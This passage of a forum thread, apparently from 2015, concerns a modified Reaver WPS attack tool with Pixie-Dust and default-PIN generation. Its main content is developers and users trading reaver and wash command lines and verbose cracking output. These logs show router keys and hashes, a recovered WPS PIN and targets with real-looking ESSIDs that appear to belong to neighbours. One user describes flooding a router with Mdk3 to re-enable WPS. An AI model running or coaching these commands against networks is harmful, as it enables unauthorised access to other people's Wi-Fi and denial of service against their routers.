    [P] PKE: db:4c:8c:5d:1c:61:a0:b5:dd:4c:4b:6a:0a:59:02:c2:46:af:29:53:d4:14:77:9e:b4:0f:48:bc:95:40:6e:ed:e4:9a:08:46:29:78:a4:fe:6a:e2:45:65:73:cf:01:b1:4c:34:60:fa:87:30:7b:d2:6a:7a:fc:7d:7d:2f:8e:55:ab:43:e7:e9:87:31:2a:dc:08:e6:3e:2b:d3:80:93:ab:5c:c4:c5:93:07:6d:19:85:f1:39:56:55:6b:93:bb:ce:09:72:e6:b5:76:00:bb:ea:f7:04:ad:2d:71:83:2a:21:a5:dd:68:1f:dc:a4:88:6b:8c:8a:4d:39:a0:53:a1:3c:2c:c5:15:4c:15:03:db:f7:01:e6:fd:22:05:17:0d:86:07:44:c7:18:8c:9d:b7:fc:13:8a:0c:01:7b:38:c8:ca:05:99:e3:1f:4a:07:10:9b:19:b5:03:02:56:32:30:1a:57:b5:db:92:48:c1:f3:3e:45:e8:60:c4:ef:2e:87:79
    [P] WPS Manufacturer: Celeno Communication, Inc.
    [P] WPS Model Number: CL1800
    [+] Received M1 message
    [P] PKR: 04:10:d7:4d:a0:29:b4:8e:00:85:85:47:cd:bc:5f:84:da:c0:c8:4a:f2:36:8c:56:5c:00:28:a8:90:31:14:11:0e:24:d8:e2:fe:8f:58:db:8c:f1:28:f9:e3:81:f7:93:2a:2e:10:3c:f5:ec:55:ba:95:a0:87:73:c6:83:00:f2:1f:e0:00:80:6c:c9:1f:5c:76:6f:27:df:c9:25:21:58:e5:24:c8:26:80:67:d4:18:ab:68:79:bd:06:ac:b9:0b:7d:75:68:52:99:0c:c3:1c:30:1c:80:a1:c1:49:5a:29:b6:ac:98:b5:b6:c3:c4:fe:67:80:02:ae:9f:f7:ef:34:41:02:39:e5:f6:6b:ec:73:19:b5:be:75:ed:ed:ac:d6:e4:0c:68:7a:b8:a7:a6:fe:98:9e:7f:00:3a:78:b3:69:df:9c:13:fc:8f:50:58:01:31:5a:1b:8c:81:5d:47:99:1b:d9:0a:8b:b0:49:6f:9b:1a:af:25:31:c5:10:13:8c
    [P] AuthKey: eb:35:cb:40:af:86:fd:1d:8d:bb:2e:8b:82:f8:02:e5:3d:19:3b:9d:6a:2d:52:d2:97:49:dd:97:48:e6:41:db
    [+] Sending M2 message
    [P] E-Hash1: b9:76:ae:bd:db:d4:18:bc:2d:31:2f:24:02:d5:c4:a6:82:15:2e:00:da:de:98:dd:4e:a9:bd:fc:ee:b4:bc:cd
    [P] E-Hash2: a3:9b:6a:34:d8:39:7f:9e:07:21:68:b3:67:ed:82:42:08:61:e4:25:96:6d:4d:93:d6:ba:1f:38:aa:3f:09:0f
    [Pixie-Dust]  
    [Pixie-Dust]   [*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust]   [*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust]   [*] PSK1: b5:33:92:d2:5f:d2:d3:4a:ae:cb:81:db:c9:f6:63:a6
    [Pixie-Dust]   [*] PSK2: bb:f8:7f:74:54:1c:8b:74:e8:2a:3f:d3:c2:57:4e:36
    [Pixie-Dust]   [+] WPS pin: 50..........
    [Pixie-Dust]  
    [Pixie-Dust]   [*] Time taken: 0 s
    [Pixie-Dust]  
    Running the reaver with the correct pin, wait ...
    Cmd : reaver -i wlan3mon -b 8C:09:F4:.......:00 -c 9 -s y -p 50..........
    
    [Reaver Test] BSSID: 8C:09:00:11:00:11
    [Reaver Test] Channel: 9
    hangs there

  12. #12
    Join Date
    2015-Apr
    Posts
    39
    nuroo

    try with a fixed channel, the reaver is trying to get the psk, but if the reaver not able to complete the task he is in this loop until get, if the router is far away the reaver it difficult to get up to the final stage

    better I put a timeout, tomorrow will make the bug fix


    And sorry for the credits hahaha

    It would be a good he already try all the Ks, I'll think of something.

    thank you again
    Last edited by t6_x; 2015-04-15 at 09:05.

  13. #13
    Join Date
    2015-Apr
    Posts
    39
    Option -g released in the wash

    Code:
    -g, --get-chipset                    Output Piped and tries to read the chipset with reaver
    Example

    Code:
    # wash -i mon0 -g -c 2
    XX:XX:XX:XX:XX:XX| 1|-68|1.0|No |AAA| D-Link| DIR-615
    XX:XX:XX:XX:XX:XX| 1|-58|1.0|No |CCC| ASUSTeK Computer Inc.| RT-N56U

  14. #14
    Join Date
    2014-Nov
    Posts
    7
    Quote Originally Posted by soxrok2212 View Post
    Another idea... have all the extra stuff print only with verbosity mode selected
    -v -vv -vvv maby?

    Quote Originally Posted by soxrok2212 View Post
    Update: I'm getting a segmentation fault when I use -K 1 and -K 3

    Code:
    Segmentation fault
    I also receive segmentation fault error too...

  15. #15
    Join Date
    2015-Apr
    Posts
    39
    Quote Originally Posted by SubZero5 View Post
    -v -vv -vvv maby?


    I also receive segmentation fault error too...
    any router? or some router in specific?

  16. #16
    Join Date
    2013-Aug
    Location
    lost in space
    Posts
    580
    Thx t6x!

    Quote Originally Posted by SubZero5 View Post
    -v -vv -vvv maby?
    yesss. That. Keep different functions/improvement separated.
    Kali Linux USB Installation using LinuxLive USB Creator
    Howto Install HDD Kali on a USB Key
    Clean your laptop fan | basic knowledge

  17. #17
    Join Date
    2015-Mar
    Posts
    127
    In my orginal reaver command, I did not specify a channel on purpose, to troubleshoot. But your code for reaver part2 - passphrase puts -channel automatic -NICE!
    [Pixie-Dust][*] PSK2: bb:f8:7f:74:54:1c:8b:74:e8:2a:3f:d3:c2:57:4e:36
    [Pixie-Dust] [+] WPS pin: 50..........
    [Pixie-Dust]
    [Pixie-Dust][*] Time taken: 0 s
    [Pixie-Dust]
    Running the reaver with the correct pin, wait ...
    Cmd : reaver -i wlan3mon -b 8C:09:F4:.......:00 -c 9 -s y -p 50..........

    [Reaver Test] BSSID: 8C:09:00:11:00:11
    [Reaver Test] Channel: 9

    I guess the AP just so to far away like u said.

    The -g option in wash for chipset excellent idea. Better to pick targets. Can't wait to try it later.
    Last edited by nuroo; 2015-04-15 at 21:35.

  18. #18
    Join Date
    2015-Apr
    Posts
    9
    is this version of reaver compatible with wps version 00? because i tryed this on TP-LINK TD-W8961ND and it always get stock in M2 after getting PKr and wps get disabled i have to DDos the router with Mdk3 to activate wps again ScreenShot_20150414174436.jpg

  19. #19
    Join Date
    2015-Apr
    Posts
    9
    it's wierd i got the same Pkr when i tryed Reaver on TP-LINK TD-W8961ND the only problem is Reaver always get stock at M2 so i didnt AuthKe,E-Hash1 and E-Hash2

  20. #20
    Join Date
    2015-Mar
    Posts
    127
    I love the -g option. Just tried it. This is a great idea.

    Your right it does need a timer and or -rssi strength filter.

    Or maybe each access point is independent process so wash can move on to next AP, maybe display something like waiting...... until response recieved. (but i'm not coder, maybe to much work)

    00:00:00:00:B6:A0| 6|-48|1.0|No |We hear you walking upstairs| Cisco| 123456
    00:00:00:00:AD:00| 6|-47|1.0|No |TommyAndy4E| Waiting for Response..........
    00:00:00:00:37:56| 6|-56|1.0|No |100 Kane| Belkin International Inc.| RE6500
    00:00:00:00:8F:80| 6|-63|1.0|No |DG1670A82| Celeno Communication, Inc.| CL1800
    00:00:00:00:62:6C| 6|-50|1.0|No |Kirinyaga| NETGEAR, Inc.| Waiting for Response..........


    Also
    -P option on purpose have no header, so it can be small in terminal window?
    Code:
    BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
    -------------------------------------------------------------------------------------------

  21. #21
    Join Date
    2015-Apr
    Posts
    39
    This can be done, but I have to think of a more general way to create the function a little better.

    There are certain things running on a linux but not working in an embedded, I try to come up with something that works cool.

    I tried to add this option to facilitate the search time, but this problem of taking too long to be annoyed too

    What complicates the operation is that it is necessary to make requests to the router so that it responds with all the necessary data.

    When the router is far away, just that it takes a while to get up to get the message M1 and sometimes not even pass the authentication is because of this that is stopped on the screen waiting.

    At this point it would be interesting to create multithreaded functions, but must do so in a way that works on all devices, it would not be interesting reworking code for each platform.

    DataHead think that soon will make portability for bigendian and thus left open for OpenWRT and variants.


    With relation to the header, I tried to create this function to help people that creates scripts or frontends, it is easier to treat a result already relatively more processed.


    There comes a time that is difficult to decide what to do, are many options and many variations.

    have to remember that everyone is free to help

  22. #22
    Join Date
    2015-Mar
    Posts
    127
    Yep ideas are the easy part.
    <////////#~~~~~~

  23. #23
    Join Date
    2015-Apr
    Location
    cosmoland
    Posts
    18

  24. #24
    Join Date
    2015-Apr
    Posts
    39
    New update

    reaver -W option

    Code:
    -W, --generate-pin              Default Pin Generator by devttys0 team [1] Belkin [2] D-Link

    Example


    Code:
    [P] E-Nonce: 27:63:ad:1f:d1:10:.......
    [P] PKE: 2f:4e:e4:10:dd:0b:0e:7e:1e:27:b9:......
    [P] WPS Manufacturer: D-Link
    [P] WPS Model Number: ....
    [P] WPS Model Serial Number: ......
    [Pin Gen] D-Link Default Pin Generator by devttys0 team
    [Pin Gen] Pin Generated : 25657371

  25. #25
    Join Date
    2014-Nov
    Location
    Bulgaria
    Posts
    9
    Do you know something about the bug with repeating this pin 99985677 ? I tried to brute-force one D-LINK 501 but with this bug i can't. I see that other users have the same bug.

    https://code.google.com/p/reaver-wps.../detail?id=614

  26. #26
    Join Date
    2015-Apr
    Posts
    39
    Paste the reaver result

  27. #27
    Join Date
    2014-Nov
    Location
    Bulgaria
    Posts
    9
    Which result ? You want the result with hashes ? I mention the bug, because you update the reaver with new things and ...

  28. #28
    Join Date
    2015-Apr
    Posts
    39
    Quote Originally Posted by WaLkZ View Post
    Which result ? You want the result with hashes ? I mention the bug, because you update the reaver with new things and ...
    The link that you gave me it is not clear what is happening.

    It is hard I analyze the problem without having a router that has this defect, you tried to work with the options -1 and -2 to set the pin in a different position this?

  29. #29
    Join Date
    2014-Nov
    Location
    Bulgaria
    Posts
    9
    No. I tried before 3-4 months ago with classic method - collect pins. https://www.google.bg/#q=99985677+pin+loop

  30. #30
    Join Date
    2015-Apr
    Posts
    9
    please if possible give as method to add more router and thanks

  31. #31
    Join Date
    2015-Apr
    Posts
    14
    Hello !
    I've just tryed -W option with TP-Link router and it gives me pin:
    Code:
    root@root:~# reaver -i mon0 -b F8:D1:11:46:60:92 -c 6 -S -vv -W2
    
    Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com> & DataHead
    
    [+] Switching mon0 to channel 6
    [?] Restore previous session for F8:D1:11:46:60:92? [n/Y] n
    [+] Waiting for beacon from F8:D1:11:46:60:92
    [+] Associated with F8:D1:11:46:60:92 (ESSID: TP-LINK_23)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 7e:4b:d4:27:6f:5b:1b:96:92:68:ab:da:0c:0d:c1:04
    [P] PKE: 30:f4:ec:68:2c:eb:11:63:91:96:11:c9:84:b1:8b:4b:9b:72:44:47:c9:14:6a:52:04:c3:a5:eb:8d:73:0c:6b:e0:46:2f:09:84:89:64:95:a8:40:e5:61:68:d9:6f:86:13:a1:6d:a9:e0:65:08:40:2a:4e:79:b2:3d:fe:2e:09:e3:f0:de:02:bc:0e:01:21:37:15:22:c6:58:df:50:59:ae:ba:4b:28:cc:c3:ca:c8:67:9a:6b:1b:1b:a5:c8:2c:0e:0c:10:d6:fb:03:8d:5a:55:8c:57:e3:f8:b9:06:5c:af:c5:0b:47:8b:68:e5:6b:ba:3b:e4:a6:a0:5a:2b:6f:69:a3:7b:14:99:30:da:96:a6:23:fc:6e:9f:a7:5d:bc:43:2d:00:75:38:b4:3e:04:69:6f:25:0a:fb:a0:fd:04:46:a4:ed:f8:2e:f5:b6:e5:82:6c:08:5c:8b:b0:ea:da:6d:96:3b:af:40:ec:c2:80:87:d4:36:e7:5d:43:1e:de
    [P] WPS Manufacturer: TP-LINK
    [P] WPS Model Number: 4.0
    [P] WPS Model Serial Number: 1.0
    [Pin Gen] D-Link Default Pin Generator by devttys0 team
    [Pin Gen] Pin Generated : 66021674
    But this pin is wrong

    Code:
    root@root:~# reaver -i mon0 -b F8:D1:11:46:60:92 -c 6 -S -vv -p 66021674
    
    Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com> & DataHead
    
    [+] Switching mon0 to channel 6
    [+] Waiting for beacon from F8:D1:11:46:60:92
    [+] Associated with F8:D1:11:46:60:92 (ESSID: TP-LINK_23)
    [+] Starting Cracking Session. Pin count: 10000, Max pin attempts: 11000
    [+] Trying pin 66021674.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 03:15:f3:fd:c4:d0:28:66:d9:b5:44:89:18:5d:76:90
    [P] PKE: fe:b2:9b:4c:0f:f0:b7:93:07:49:94:cd:8e:27:e7:66:a9:82:c5:b1:3e:57:db:10:b6:bc:7b:b5:b9:e1:a8:f1:95:28:79:0a:90:18:54:8e:f1:ed:9e:cf:36:c6:85:3e:16:54:66:f5:fc:e0:a7:75:d8:f9:70:3d:99:28:a2:49:73:dc:56:19:2b:9d:77:72:d8:47:f8:dc:d8:15:52:92:e4:3a:cd:bb:c0:c2:ff:6e:ed:a7:ed:b5:c8:3b:ee:7f:db:e2:74:7b:48:73:9a:5d:e9:26:a8:44:6e:79:43:c4:27:31:ed:5e:3b:96:19:d1:95:8a:47:0e:7a:52:b9:72:2c:bb:44:1a:d1:1d:4c:3f:cc:e4:d5:36:03:5f:68:65:b7:ba:c3:c3:6a:4f:a0:7a:d1:3f:32:23:2a:98:fb:11:24:e2:3b:0a:8d:29:f8:87:87:7d:4c:30:5c:06:1d:31:41:53:71:46:5c:fc:e9:9a:fa:1c:34:50:5b:7d:af:ec
    [P] WPS Manufacturer: TP-LINK
    [P] WPS Model Number: 4.0
    [P] WPS Model Serial Number: 1.0
    [+] Received M1 message
    [P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:02
    [P] AuthKey: fa:7d:f6:ff:8d:08:af:de:0e:06:8f:c3:e6:9e:bb:b7:57:7b:49:a8:cb:fd:e9:0f:ee:40:91:ae:94:3c:86:67
    [+] Sending M2 message
    [P] E-Hash1: c9:44:26:f8:b0:91:05:54:a8:e7:fb:e4:db:14:94:14:5a:c7:7b:d6:8a:dd:4c:f6:74:9c:9b:c5:86:4e:2b:23
    [P] E-Hash2: 4a:3a:e9:db:9d:2d:e5:d7:6d:d9:61:df:67:b4:5f:08:99:17:4a:0d:ca:90:e4:54:ff:60:d4:02:be:9e:fd:e8
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] p2_index set to 1
    [+] Pin count advanced: 10001. Max pin attempts: 11000
    [+] Trying pin 66021674.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: f4:c4:53:ae:77:33:76:ca:4e:38:
    For other TP-Link router the same situation:
    Code:
    root@root:~# reaver -i mon0 -b 10:FE:ED:9E:C7:92 -c 11 -S -W2 -vv
    
    Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com> & DataHead
    
    [+] Switching mon0 to channel 11
    [+] Waiting for beacon from 10:FE:ED:9E:C7:92
    [+] Associated with 10:FE:ED:9E:C7:92 (ESSID: TP-LINK_9EC792)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: e9:d9:8c:79:f4:66:03:df:31:b3:c7:b0:da:2d:ad:42
    [P] PKE: 5f:3e:5a:21:2f:ad:2b:49:d9:bf:52:1a:eb:e4:a0:b9:f6:57:30:8e:58:12:d0:57:45:70:b3:d6:d5:87:43:a0:82:4e:5d:c1:46:d7:3f:86:54:b9:fe:c3:5a:c2:08:cc:a2:94:c5:ef:72:4b:0e:b9:d7:20:85:cc:60:72:34:35:10:41:8d:c0:46:4b:cd:13:a5:ce:66:b7:b8:e6:62:3a:af:3f:bc:cd:d4:5d:4e:8d:01:2c:16:fc:20:0c:d0:3a:93:e5:ef:dd:a9:f8:37:83:6b:08:6e:c8:60:92:be:68:14:e9:bd:a5:21:fa:80:ef:4c:cd:64:f4:6d:ee:59:98:f2:4f:fa:83:77:29:38:27:21:7f:12:00:89:f8:9e:f7:c4:81:83:5e:e8:e5:50:8d:07:b9:3b:f1:e5:84:a9:d0:35:8e:aa:ad:d8:aa:08:10:94:ba:2d:93:88:e9:95:ef:f4:d4:22:a2:f5:bb:fd:b3:f1:40:dc:c9:fc:0c:ce:eb
    [P] WPS Manufacturer: TP-LINK
    [P] WPS Model Number: 4.0
    [P] WPS Model Serial Number: 1.0
    [Pin Gen] D-Link Default Pin Generator by devttys0 team
    [Pin Gen] Pin Generated : 23276079
    
    root@root:~# reaver -i mon0 -b 10:FE:ED:9E:C7:92 -c 11  -W2 -vv
    
    Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com> & DataHead
    
    [+] Switching mon0 to channel 11
    [+] Waiting for beacon from 10:FE:ED:9E:C7:92
    [+] Associated with 10:FE:ED:9E:C7:92 (ESSID: TP-LINK_9EC792)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 77:b4:31:9b:fa:fd:7c:69:18:2d:d6:67:61:67:39:d7
    [P] PKE: 81:a3:87:a9:28:b7:7c:31:e9:bf:84:60:a0:33:2c:45:5a:aa:d2:9c:91:4c:64:cf:da:90:3b:97:21:84:9d:d5:d2:4d:f6:df:68:73:ab:09:70:e4:d8:3c:0e:3b:75:c8:39:5a:60:ba:bd:2e:19:88:cf:cb:8a:ba:50:62:55:51:6b:b9:79:95:29:87:fc:5c:68:7f:ef:ba:d5:58:8a:2f:e3:b7:0e:dc:86:52:f6:45:7d:1a:f7:dc:ee:02:25:1a:1e:89:1c:8a:54:6f:22:d7:10:62:14:13:6e:6a:be:bd:c4:d2:95:99:c1:48:9d:0f:0e:17:6c:b5:ff:73:a9:bc:56:fa:4c:db:4d:c5:da:23:3f:9a:3f:cf:a1:0b:cc:70:d1:e3:87:ab:e8:7f:5b:14:a0:b1:60:3f:97:8d:af:c6:ea:58:0b:27:e6:20:6e:b9:ab:a1:4b:08:76:1a:33:b0:0b:65:1d:1e:20:0b:21:38:ab:a1:39:77:3a:c2:05:96
    [P] WPS Manufacturer: TP-LINK
    [P] WPS Model Number: 4.0
    [P] WPS Model Serial Number: 1.0
    [Pin Gen] D-Link Default Pin Generator by devttys0 team
    [Pin Gen] Pin Generated : 23276079
    
    root@root:~# reaver -i mon0 -b 10:FE:ED:9E:C7:92 -c 11  -p 23276079 -vv
    
    Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com> & DataHead
    
    [+] Switching mon0 to channel 11
    [+] Waiting for beacon from 10:FE:ED:9E:C7:92
    [+] Associated with 10:FE:ED:9E:C7:92 (ESSID: TP-LINK_9EC792)
    [+] Starting Cracking Session. Pin count: 10000, Max pin attempts: 11000
    [+] Trying pin 23276079.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: cd:0b:6e:a2:32:b5:73:f8:0a:6c:a7:db:f3:e8:b7:3d
    [P] PKE: 8b:c9:c8:4b:61:5a:88:87:b3:7b:b3:5b:95:91:7c:f8:59:11:85:b1:b7:4a:58:c9:7d:d5:c6:45:44:30:9c:b1:1c:2e:d2:85:88:93:86:1c:21:25:e9:d5:4b:29:38:f5:76:b9:9c:43:a4:31:fc:01:82:fb:49:18:3f:1d:0f:90:02:2b:29:9e:24:bb:6d:b0:22:75:50:4d:52:4b:88:3e:47:7a:42:bc:6a:2d:1d:18:6c:7d:98:41:07:c8:44:6d:ee:b6:07:09:b4:9e:89:a2:48:11:2f:d4:ac:aa:be:bc:f4:10:b0:db:f5:ac:fe:0c:3f:20:62:63:d7:f4:82:61:4e:8a:6d:63:53:bb:63:fa:f6:3b:f3:6d:97:e9:8a:9a:21:35:e4:96:09:ae:5b:db:79:15:49:bb:aa:f0:71:fc:91:b4:58:82:4c:07:95:7e:5e:c8:d3:e7:d2:c1:d9:3f:3f:19:9e:b1:4d:b0:a2:ea:af:9d:6f:b1:97:ac:b5:a4
    [P] WPS Manufacturer: TP-LINK
    [P] WPS Model Number: 4.0
    [P] WPS Model Serial Number: 1.0
    [+] Received M1 message
    [P] PKR: c7:2f:8a:a2:10:12:d9:d2:05:61:3c:a6:7a:20:80:b3:56:20:39:d9:a3:d7:a3:69:8a:c9:90:d3:6b:da:b4:8b:3e:af:6e:02:3b:7d:b6:99:8c:d1:48:c5:28:62:36:b1:c3:86:ef:75:95:ed:81:f4:f7:4f:8e:d8:b8:88:9c:f9:fe:fa:14:da:52:9d:a4:08:1a:c1:e6:ad:e6:e2:85:2d:e5:fc:e6:ef:8f:ae:05:02:b5:34:d2:4e:01:ff:49:01:c6:db:56:75:f7:05:9d:e1:22:f9:63:03:a5:2e:5e:da:e9:45:fe:6d:1b:b5:dc:a3:4b:93:9c:c8:63:44:9b:8e:7f:18:2a:21:df:bc:b9:a6:b2:42:ae:42:ca:89:59:f3:c5:c4:26:ed:b9:c5:95:d5:5e:26:be:8f:ae:b6:8c:09:8f:32:68:a5:b7:c3:50:fb:72:57:e4:db:99:57:ca:5b:e6:5e:82:94:7e:46:31:db:ac:70:33:36:a7:70:f1:cc
    [P] AuthKey: ce:03:54:4f:95:88:fd:73:eb:95:00:8d:3e:d6:4f:2d:f3:c8:55:69:84:c3:b6:25:6e:c5:4d:38:b4:7d:b6:eb
    [+] Sending M2 message
    [P] E-Hash1: 31:59:76:88:83:d2:4d:62:7d:9b:6c:f8:2d:d7:0a:66:31:ae:ed:a5:ca:de:5f:d1:17:ef:7a:a2:f0:4c:47:24
    [P] E-Hash2: 34:c6:ed:b1:2d:bf:07:ab:a2:4b:2d:2c:2d:5f:73:98:95:06:30:96:eb:eb:16:79:ef:a2:1f:10:79:c8:63:32
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] p2_index set to 1
    [+] Pin count advanced: 10001. Max pin attempts: 11000
    [+] Trying pin 23276079.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    So, what is wrong maybe i'm using -W opt incorrect ?

  32. #32
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Quote Originally Posted by fbs-16 View Post
    Hello
    So, what is wrong maybe i'm using -W opt incorrect ?
    Well, it just might be the fact that you're using a D-Link generator for a TP-Link AP... but no, that can't be!
    Last edited by soxrok2212; 2015-04-17 at 21:18.

  33. #33
    Join Date
    2015-Apr
    Posts
    39
    Code:
    [P] WPS Manufacturer: TP-LINK
    [P] WPS Model Number: 4.0
    [P] WPS Model Serial Number: 1.0
    [Pin Gen] D-Link Default Pin Generator by devttys0 team
    [Pin Gen] Pin Generated : 66021674
    You realize that the -W option works for two types of routers? D-Link and Belkin, and only for some models of these companies?
    You are trying to use the D-Link generator on a router TP-Link?

    I think this is not being done properly

    In own output is written D-Link, please a little more attention

  34. #34
    Join Date
    2015-Apr
    Posts
    14
    sorry, i was too much obvious. Thank you for explanation and your work! I found only 1 D-Link router but it gave me the same problem. I believe it's one of "some models of these companies" which are protected.
    I was trying both W2 and W1:
    Code:
    reaver -i mon0 -b 14:D6:4D:2D:C7:64 -c 3 -vv -S -W2
    
    Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com> & DataHead
    
    [+] Switching mon0 to channel 3
    [?] Restore previous session for 14:D6:4D:2D:C7:64? [n/Y] n
    [+] Waiting for beacon from 14:D6:4D:2D:C7:64
    [+] Associated with 14:D6:4D:2D:C7:64 (ESSID: 67248Lengen)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: e4:bc:d7:2b:75:a4:10:45:54:d4:69:98:e7:fe:a0:e6
    [P] PKE: 57:09:eb:12:09:28:f1:e3:68:0f:21:fe:d8:9f:b4:15:21:31:4e:92:b9:70:55:e1:cd:59:7c:3d:c9:fc:fc:58:68:0a:60:9b:26:52:12:05:f5:17:c1:a7:a0:98:bf:40:f5:2e:8f:c1:ba:3c:bc:8b:78:d4:e5:9a:74:1b:8c:72:43:e4:a4:ed:1d:bf:00:dd:e8:39:14:c6:20:ea:57:09:8e:cc:b0:d8:fb:02:ba:71:c1:b2:ed:0a:e2:90:f3:ef:bd:1f:5a:77:59:58:52:83:3a:ec:6d:09:06:0f:1d:a9:0c:e2:7e:3e:91:35:5e:55:ac:29:4e:e3:11:59:9d:62:da:e5:fb:e7:61:9a:8d:3e:cb:d8:f1:cd:36:b2:29:91:e7:9e:46:79:9e:52:9d:d5:77:4a:43:ab:7d:87:ad:b9:d4:c9:82:19:5f:e0:7f:5a:ee:a3:48:5d:04:43:4b:b2:05:e4:4e:e8:9d:ca:f4:13:6d:d4:06:1b:88:9f:2b:75
    [P] WPS Manufacturer: D-Link
    [P] WPS Model Number: DIR-615
    [P] WPS Model Serial Number: none
    [Pin Gen] D-Link Default Pin Generator by devttys0 team
    [Pin Gen] Pin Generated : 69130571
    
    root@root:~# reaver -i mon0 -b 14:D6:4D:2D:C7:64 -c 3 -vv -p 69130571
    
    Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com> & DataHead
    
    [+] Switching mon0 to channel 3
    [+] Waiting for beacon from 14:D6:4D:2D:C7:64
    [+] Associated with 14:D6:4D:2D:C7:64 (ESSID: 67248Lengen)
    [+] Starting Cracking Session. Pin count: 10000, Max pin attempts: 11000
    [+] Trying pin 69130571.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 1e:80:8f:8d:00:49:27:e8:34:c8:02:f1:be:6c:17:06
    [P] PKE: 21:2c:e8:59:ca:7a:60:38:b2:4e:29:6a:a3:7e:58:d2:a5:df:89:03:a8:78:e6:27:39:1e:69:46:62:ba:af:af:d5:a0:1d:11:36:6a:c9:02:d8:23:a5:28:b3:69:f2:39:db:5e:2f:cc:0c:f4:81:29:64:1d:e7:f4:7f:62:c8:79:4a:dd:3b:ed:5d:e0:fd:08:66:2b:e3:02:24:3a:2d:35:48:4e:3e:d7:af:d2:8f:18:ba:50:eb:24:e0:5a:03:82:90:69:c1:a1:af:a3:bf:1c:5d:1b:54:48:5e:5b:61:06:1a:1f:54:b5:67:da:6a:e0:04:44:6a:f2:c0:2f:58:6d:4c:f7:a7:b3:ce:a3:dd:d4:ca:4a:fd:e5:ad:a7:c6:c3:e9:8f:f2:9b:97:f1:f5:9e:a4:07:8c:12:fe:ea:35:47:ee:cc:4e:8f:f0:64:6c:a7:7a:c7:6a:84:0f:ea:e8:77:76:e3:89:21:ba:4f:08:56:33:62:78:cf:1d:6c:57:7d
    [P] WPS Manufacturer: D-Link
    [P] WPS Model Number: DIR-615
    [P] WPS Model Serial Number: none
    [+] Received M1 message
    [P] PKR: ab:c9:36:63:de:53:66:02:df:77:ae:85:a1:aa:90:61:f3:a0:7e:fd:0b:ba:68:e0:13:5b:70:10:66:46:6b:eb:26:d3:33:43:fa:0d:82:f2:b4:88:f6:8c:02:fb:0b:07:76:5c:06:8c:eb:36:b8:fd:7f:7e:ce:19:18:77:dd:24:e4:30:62:42:6f:a9:27:3c:dc:8d:1f:36:5c:c1:43:e3:23:c7:ba:c4:48:a9:c4:d8:a7:0a:64:2a:2c:0b:0d:8f:d7:5c:7f:d9:22:f5:8c:3b:50:42:17:fe:56:71:4a:ff:75:d2:18:df:44:0d:6f:ce:87:3c:38:77:f8:f1:09:39:8f:cc:ba:75:67:11:20:a2:bd:99:25:fe:62:ac:5b:9d:97:71:2f:96:7f:0e:da:44:3f:bd:62:9c:e4:53:d7:81:21:64:79:a0:46:6d:36:18:ec:77:57:43:6d:c4:d2:d3:43:e0:38:f6:4e:ae:5c:cc:ae:4c:d6:31:a5:68:cc:84
    [P] AuthKey: dc:c0:e9:e9:e2:13:b4:81:d5:92:e6:b7:b8:7e:0e:e0:29:49:6e:eb:9a:95:7f:9e:05:92:48:3e:38:2a:86:3a
    [+] Sending M2 message
